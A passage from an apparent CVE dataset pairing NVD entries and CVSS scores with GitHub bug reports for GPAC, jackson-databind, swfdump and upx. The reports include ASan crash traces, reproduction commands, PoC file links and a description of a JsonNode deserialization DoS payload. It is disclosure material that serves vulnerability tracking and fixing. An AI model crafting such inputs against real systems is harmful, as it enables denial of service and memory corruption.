#16 0x55d5db47bcc0 in main /root/gpac/applications/mp4box/mp4box.c:6846
#17 0x7fa5c8e02082 in __libc_start_main ../csu/libc-start.c:308
#18 0x55d5db439b6d in _start (/root/gpac/bin/gcc/MP4Box+0x104b6d)
Address 0x603000001114 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/mpegts.c:828 in gf_m2ts_process_sdt
Shadow bytes around the buggy address:
0x0c067fff81d0: 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00 00 fa
0x0c067fff81e0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x0c067fff81f0: fd fa fa fa 00 00 01 fa fa fa fd fd fd fa fa fa
0x0c067fff8200: 00 00 00 03 fa fa 00 00 00 03 fa fa 00 00 00 00
0x0c067fff8210: fa fa 00 00 04 fa fa fa 00 00 01 fa fa fa fa fa
=>0x0c067fff8220: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==4003817==ABORTING
```
## poc
https://github.com/xxy1126/Vuln/blob/main/gpac/3 | Heap-buffer-overflow in function gf_m2ts_process_sdt of media_tools/mpegts.c:828 | https://api.github.com/repos/gpac/gpac/issues/2388/comments | 2 | 2023-02-02T14:57:17Z | 2023-03-21T04:19:07Z | https://github.com/gpac/gpac/issues/2388 | 1,568,208,539 | 2,388 |
CVE-2023-1449 | 2023-03-17T07:15:12.347 | A vulnerability has been found in GPAC 2.3-DEV-rev35-gbbca86917-master and classified as problematic. This vulnerability affects the function gf_av1_reset_state of the file media_tools/av_parsers.c. The manipulation leads to double free. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-223294 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "[email protected]",
"type": "Secondary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2387"
},
{
"source": "[email protected]",
"tags": [
"Exploit"
],
"url": "https://github.com/xxy1126/Vuln/blob/main/gpac/2"
},
{
"source": "[email protected]",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.223294"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.223294"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3:dev:*:*:*:*:*:*",
"matchCriteriaId": "0099B624-674B-4F45-9270-DD638617A1D1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2387 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
## version
```
MP4Box - GPAC version 2.3-DEV-rev35-gbbca86917-master
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer --enable-debug
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
## reproduce
complie and run
```
./configure --enable-sanitizer
make
./MP4Box -info poc
```
information reported by sanitizer
```
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] unknown OBU type 12 (size 100). Skipping.
[AV1] computed OBU size -1 (input value = 0). Skipping.
=================================================================
==4000990==ERROR: AddressSanitizer: attempting double-free on 0x615000013400 in thread T0:
#0 0x7fe4a288c40f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122
#1 0x7fe49b5abbd9 in gf_free utils/alloc.c:165
#2 0x7fe49c378e6f in gf_av1_reset_state media_tools/av_parsers.c:4024
#3 0x7fe49d61b5db in av1dmx_finalize filters/reframe_av1.c:1246
#4 0x7fe49ce06b63 in gf_fs_del filter_core/filter_session.c:771
#5 0x7fe49c42688d in gf_media_import media_tools/media_import.c:1293
#6 0x55a5ca2469ab in convert_file_info /root/gpac/applications/mp4box/fileimport.c:130
#7 0x55a5ca1ff07d in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6302
#8 0x55a5ca201cc0 in main /root/gpac/applications/mp4box/mp4box.c:6846
#9 0x7fe4973ab082 in __libc_start_main ../csu/libc-start.c:308
#10 0x55a5ca1bfb6d in _start (/root/gpac/bin/gcc/MP4Box+0x104b6d)
0x615000013400 is located 0 bytes inside of 512-byte region [0x615000013400,0x615000013600)
freed by thread T0 here:
#0 0x7fe4a288cc3e in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:163
#1 0x7fe49b5abbbb in gf_realloc utils/alloc.c:160
#2 0x7fe49b58ae0e in gf_bs_write_data utils/bitstream.c:1059
#3 0x7fe49c3667af in av1_add_obu_internal media_tools/av_parsers.c:2519
#4 0x7fe49c36785c in av1_populate_state_from_obu media_tools/av_parsers.c:2596
#5 0x7fe49c367d8f in aom_av1_parse_temporal_unit_from_section5 media_tools/av_parsers.c:2623
#6 0x7fe49d616bd4 in av1dmx_parse_av1 filters/reframe_av1.c:1006
#7 0x7fe49d6179ee in av1dmx_process_buffer filters/reframe_av1.c:1084
#8 0x7fe49d61b0ff in av1dmx_process filters/reframe_av1.c:1225
#9 0x7fe49ce6abe4 in gf_filter_process_task filter_core/filter.c:2828
#10 0x7fe49ce156d7 in gf_fs_thread_proc filter_core/filter_session.c:1859
#11 0x7fe49ce18ce8 in gf_fs_run filter_core/filter_session.c:2120
#12 0x7fe49c424742 in gf_media_import media_tools/media_import.c:1228
#13 0x55a5ca2469ab in convert_file_info /root/gpac/applications/mp4box/fileimport.c:130
#14 0x55a5ca1ff07d in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6302
#15 0x55a5ca201cc0 in main /root/gpac/applications/mp4box/mp4box.c:6846
#16 0x7fe4973ab082 in __libc_start_main ../csu/libc-start.c:308
previously allocated by thread T0 here:
#0 0x7fe4a288c808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x7fe49b5abb69 in gf_malloc utils/alloc.c:150
#2 0x7fe49b57ab5d in gf_bs_new utils/bitstream.c:154
#3 0x7fe49c3661b6 in av1_add_obu_internal media_tools/av_parsers.c:2492
#4 0x7fe49c36785c in av1_populate_state_from_obu media_tools/av_parsers.c:2596
#5 0x7fe49c367d8f in aom_av1_parse_temporal_unit_from_section5 media_tools/av_parsers.c:2623
#6 0x7fe49d606a79 in av1dmx_check_format filters/reframe_av1.c:269
#7 0x7fe49d617838 in av1dmx_process_buffer filters/reframe_av1.c:1075
#8 0x7fe49d61b0ff in av1dmx_process filters/reframe_av1.c:1225
#9 0x7fe49ce6abe4 in gf_filter_process_task filter_core/filter.c:2828
#10 0x7fe49ce156d7 in gf_fs_thread_proc filter_core/filter_session.c:1859
#11 0x7fe49ce18ce8 in gf_fs_run filter_core/filter_session.c:2120
#12 0x7fe49c424742 in gf_media_import media_tools/media_import.c:1228
#13 0x55a5ca2469ab in convert_file_info /root/gpac/applications/mp4box/fileimport.c:130
#14 0x55a5ca1ff07d in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6302
#15 0x55a5ca201cc0 in main /root/gpac/applications/mp4box/mp4box.c:6846
#16 0x7fe4973ab082 in __libc_start_main ../csu/libc-start.c:308
SUMMARY: AddressSanitizer: double-free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 in __interceptor_free
==4000990==ABORTING
```
## poc
https://github.com/xxy1126/Vuln/blob/main/gpac/2 | Double free in gf_av1_reset_state media_tools/av_parsers.c:4024 | https://api.github.com/repos/gpac/gpac/issues/2387/comments | 2 | 2023-02-02T10:24:45Z | 2023-03-21T04:26:10Z | https://github.com/gpac/gpac/issues/2387 | 1,567,763,524 | 2,387 |
CVE-2023-1452 | 2023-03-17T07:15:12.947 | A vulnerability was found in GPAC 2.3-DEV-rev35-gbbca86917-master. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file filters/load_text.c. The manipulation leads to buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-223297 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "[email protected]",
"type": "Secondary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2386"
},
{
"source": "[email protected]",
"tags": [
"Exploit"
],
"url": "https://github.com/xxy1126/Vuln/blob/main/gpac/1.mp4"
},
{
"source": "[email protected]",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.223297"
},
{
"source": "[email protected]",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.223297"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3:dev:*:*:*:*:*:*",
"matchCriteriaId": "0099B624-674B-4F45-9270-DD638617A1D1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2386 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
## version
```
MP4Box - GPAC version 2.3-DEV-rev35-gbbca86917-master
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer --enable-debug
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
## reproduce
complie and run
```
./configure --enable-sanitizer
make
./MP4Box -info poc
```
information
```
filters/load_text.c:353:14: runtime error: index 2048 out of bounds for type 'char [2048]'
```
## poc
https://github.com/xxy1126/Vuln/blob/main/gpac/1.mp4
| Buffer overflow in filters/load_text.c:353:14 | https://api.github.com/repos/gpac/gpac/issues/2386/comments | 2 | 2023-02-02T09:53:52Z | 2023-03-21T04:44:47Z | https://github.com/gpac/gpac/issues/2386 | 1,567,701,993 | 2,386 |
CVE-2021-46877 | 2023-03-18T22:15:11.357 | jackson-databind 2.10.x through 2.12.x before 2.12.6 and 2.13.x before 2.13.1 allows attackers to cause a denial of service (2 GB transient heap usage per read) in uncommon situations involving JsonNode JDK serialization. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/3328"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Release Notes"
],
"url": "https://groups.google.com/g/jackson-user/c/OsBsirPM_Vw"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "439EA36C-3D2E-4B27-B36B-AECEC34E0D8A",
"versionEndExcluding": "2.12.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.10.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:2.13.0:-:*:*:*:*:*:*",
"matchCriteriaId": "28B35307-C357-43CD-9201-52974EB429EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:2.13.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "F2CB4DE8-6230-4E88-98B0-F94C87B1ED29",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:2.13.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "F4EC2939-0A70-4587-B14A-335D62C3F901",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/FasterXML/jackson-databind/issues/3328 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | There is a report on possible DoS attack, against certain versions of Jackson 2.10.x - 2.13.x (does not affect earlier versions like 2.9, nor future 2.14 and 3.0).
CVE: https://nvd.nist.gov/vuln/detail/CVE-2021-46877
Fix has been included in versions:
* 2.12.6
* 2.13.1
No current plans to back-porting into 2.10 or 2.11 branches (2.9 and earlier not affected).
------
# CVE description
## Applicability
The vulnerability is available only when using _JDK serialization_ to serialize, deserialize `JsonNode` values: this is not something most users ever do, nor is it recommended for general usage.
So, any other use of `JsonNode` is completely unrelated to the reported CVE: this ONLY APPLIES WITH JDK SERIALIZATION.
## Example
So how does one use JDK Serialization with Jackson's `JsonNode`?
Example of such usage (copied from test `NodeJDKSerializationTest.java`) is:
```
ObjectNode root = MAPPER.createObjectNode();
root.put("answer", 42);
// Instead of usual "write as JSON" (using "node.toString()" or serialize using ObjectMapper)
// something wants to use JDK serialization: some caching frameworks do this
ByteArrayOutputStream bytes = new ByteArrayOutputStream();
ObjectOutputStream obOut = new ObjectOutputStream(bytes);
obOut.writeObject(root);
obOut.close();
byte[] jdkSer = bytes.toByteArray();
// and somewhere something wants to read it back like so:
ObjectInputStream objIn = new ObjectInputStream(new ByteArrayInputStream(jdkSer));
ObjectNode fromSer = (ObjectNode) objIn.readObject();
// ^^^^ to cause DoD, attacker would need to produce a specifically changed version of
// payload!
```
The issue with JDK serialization is due to combination of format used and original code (see class `NodeSerialization` for details).
First: `JsonNode` is serialized as a sequence of bytes where first 4 bytes indicate length of actual content; and contents are JSON serialization itself. When reading it back (JDK deserialization) length is read first, original code allocates a `byte[]` with that size, and then contents are read. This works, functionally speaking.
But if attacker provides, instead, a payload that contains only 4-byte length, with value of `Integer.MAX_VALUE`, then decoder will:
1. Read the length
2. Allocate 2 gig `byte[]` array
3. If it succeeds, try to read contents, fail
The problem here is that during step (2), a large buffer allocation may well run process out of (heap) memory -- especially so if attacker manages to inject multiple broken messages.
Fix is to avoid eager allocation of big buffers and only allocate buffers as needed, along reading of the payload.
| Possible DoS if using JDK serialization to serialize `JsonNode` [CVE-2021-46877] | https://api.github.com/repos/FasterXML/jackson-databind/issues/3328/comments | 21 | 2021-11-20T02:09:34Z | 2023-03-24T16:49:50Z | https://github.com/FasterXML/jackson-databind/issues/3328 | 1,059,035,707 | 3,328 |
CVE-2023-27249 | 2023-03-23T02:15:12.733 | swfdump v0.9.2 was discovered to contain a heap buffer overflow in the function swf_GetPlaceObject at swfobject.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Broken Link"
],
"url": "http://swfdump.com"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/keepinggg/poc/blob/main/poc_of_swfdump/poc"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/keepinggg/poc/tree/main/poc_of_swfdump"
},
{
"source": "[email protected]",
"tags": [
"Product"
],
"url": "https://github.com/matthiaskramm/swftools"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/matthiaskramm/swftools/issues/197"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/matthiaskramm/swftools/issues/197 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"matthiaskramm",
"swftools"
] | # heap-buffer-overflow
## env
ubuntu20.04
gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)
swfdump - part of swftools 0.9.2
## sample
[poc.zip](https://github.com/keepinggg/poc/blob/main/poc_of_swfdump/poc)
## crash
```
./swfdump -D poc
==2946990==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000023 at pc 0x7f76f23fca7d bp 0x7fff4af77e40 sp 0x7fff4af775e8
READ of size 11 at 0x603000000023 thread T0
#0 0x7f76f23fca7c in __interceptor_strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:354
#1 0x561bf882902a in swf_GetPlaceObject modules/swfobject.c:195
#2 0x561bf881db3a in main /home/ther/fuzzing/swftools-master/src/swfdump.c:1341
#3 0x7f76f205c082 in __libc_start_main ../csu/libc-start.c:308
#4 0x561bf8816ced in _start (/home/ther/fuzzing/swftools-master/src/swfdump+0x23ced)
0x603000000023 is located 0 bytes to the right of 19-byte region [0x603000000010,0x603000000023)
allocated by thread T0 here:
#0 0x7f76f24a2808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x561bf888d0ef in rfx_alloc /home/ther/fuzzing/swftools-master/lib/mem.c:30
#2 0x561bf889c4b3 (/home/ther/fuzzing/swftools-master/src/swfdump+0xa94b3)
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:354 in __interceptor_strlen
Shadow bytes around the buggy address:
0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c067fff8000: fa fa 00 00[03]fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2946990==ABORTING
``` | heap-buffer-overflow exists in the function swf_GetPlaceObject in swfobject.c | https://api.github.com/repos/swftools/swftools/issues/197/comments | 0 | 2023-02-26T09:28:41Z | 2023-02-26T09:28:41Z | https://github.com/swftools/swftools/issues/197 | 1,599,986,264 | 197 |
CVE-2021-43311 | 2023-03-24T20:15:08.223 | A heap-based buffer overflow was discovered in upx, during the generic pointer 'p' points to an inaccessible address in func get_le32(). The problem is essentially caused in PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5382. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/upx/upx/issues/380"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA",
"versionEndExcluding": "4.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/upx/upx/issues/380 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"upx",
"upx"
] | ## What's the problem (or question)?
Multi heap-based buffer overflows were discovered in upx, during the genric pointer 'p' points to an inaccessible address in func get_le32(). The issue can be triggered by different places, which can cause a denial of service. The issue is diff from [issue365](https://github.com/upx/upx/issues/365)
ASAN reports:
```bash
==112024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00001f3b1 at pc 0x0000005292cb bp 0x7fffc3995640 sp 0x7fffc3995630
READ of size 4 at 0x61d00001f3b1 thread T0
#0 0x5292ca in get_le32(void const*) /home/test/Desktop/EVAULATION/upx/src/bele.h:164
#1 0x5292ca in N_BELE_RTP::LEPolicy::get32(void const*) const /home/test/Desktop/EVAULATION/upx/src/bele_policy.h:192
#2 0x4589c1 in Packer::get_te32(void const*) const /home/test/Desktop/EVAULATION/upx/src/packer.h:296
#3 0x4589c1 in PackLinuxElf32::elf_lookup(char const*) const /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:5382
#4 0x463d30 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:315
#5 0x464e96 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.h:395
